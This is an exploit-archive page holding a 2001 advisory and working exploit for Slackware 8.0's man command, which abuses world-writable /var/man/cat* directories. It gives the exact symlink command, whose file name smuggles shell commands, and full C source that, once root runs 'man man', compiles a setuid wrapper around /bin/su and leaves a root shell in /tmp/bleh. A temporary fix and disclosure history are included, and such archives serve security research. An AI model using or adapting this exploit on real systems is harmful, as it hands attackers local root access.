slackware.man.c

slackware.man.c: Posted Jul 18, 2001; Authored by Zen-Parse, Josh, Lockdown; Slackware 8.0 and below ships with /var/man/cat* chmodded 1777, making it vulnerable to symlink attacks. This exploit creates a suid shell with the UID of the user running man.; tags | exploit, shell; systems | linux, slackware; SHA-256 | 0fb25cf68a4fba71eceef2ca23db4efbe592af7e1416b2d13051e5e4b6990a46; Download | Favorite | View

slackware.man.c

The following advisory was sent to slackware July 11th, 2001, they failed
to respond so I hope the temporary patch will make do:

Submitted by  : Josh (josh@pulltheplug.com), lockdown (lockdown@lockeddown.net)
                zen-parse (zen-parse@gmx.net)
Vulnerability : /usr/bin/man
Tested On     : Slackware 8.0 and before.
Local         : Yes
Remote        : No
Temporary Fix : chmod 700 /var/man/cat*
Target        : root or any other user that uses man
Greets to     : alpha, fr3n3tic, omega, eazyass, remmy, RedPen, banned-it,
                slider, cryptix, s0ttle, xphantom, qtip, Sultrix, Defiance,
                Insane, rusko, falcon-networks.com.
See also      : http://www.securityfocus.com/vdb/?id=2815



        Slackware 8.0 and previous issues of Slackware are released with
/var/man/cat*/ chmod 1777:

drwxrwxrwt 2 root root 4096 Jul 11 11:03 cat*/

Since these directories are world writeable we can create symlinks there
like so:

`ln -s "/usr/man/man7/man.7.gz;cd;cd ..;cd ..;cd ..;cd ..;cd tmp;export PATH=.
;script;man.7"
/var/man/cat7/man.7.gz`

When `/usr/bin/man man` is executed by root, it will create
/var/man/cat7/man.1.gz.  The symlink forces it to create a file in
/usr/man/man7 named:
"/usr/man/man7/man.7.gz;cd;cd ..;cd ..;cd ..;cd ..;cd tmp;exportPATH=.;
script;man.7.gz."

/usr/bin/man will then execute /tmp/script which contains:

#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <errno.h>

int main()
{
  FILE *fil;
  mode_t perm = 06711;

  if(!getuid()) {
    fil = fopen("/tmp/bleh.c","w");
    fprintf(fil,"%s\n","#include <unistd.h>");
    fprintf(fil,"%s\n","#include <stdio.h>");
    fprintf(fil,"%s\n","int main() {");
    fprintf(fil,"%s\n","setreuid(0,0);setregid(0,0);");
    fprintf(fil,"%s\n","execl(\"/bin/su\",\"su\",NULL);");
    fprintf(fil,"%s\n","return 0; }");
    fclose(fil);
    system("/usr/bin/gcc -o /tmp/bleh /tmp/bleh.c");
    unlink("/tmp/bleh.c");
    chmod("/tmp/bleh", perm);
  }
   execl("/usr/bin/man","man","/usr/man/man7/man.7.gz",NULL);
   return 0;
}

With the above code compiled in /tmp/script, if root were to run `man man`, a
suid shell would be left in /tmp/bleh.

Top Authors In Last 30 Days

Red Hat 266 files
Ubuntu 54 files
Debian 23 files
Gentoo 17 files
Ahmet Umit Bayram 10 files
Apple 9 files
malvuln 7 files
Jann Horn 5 files
Google Security Research 5 files
nu11secur1ty 4 files

File Archives

Systems

AIX (429)
Apple (2,088)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,051)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,500)
HPUX (880)
iOS (375)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,873)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,976)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,535)
UNIX (9,409)
UnixWare (187)
Windows (6,660)
Other

slackware.man.c

slackware.man.c

File Archive:

June 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

slackware.man.c

Share This

slackware.man.c

File Archive:

June 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems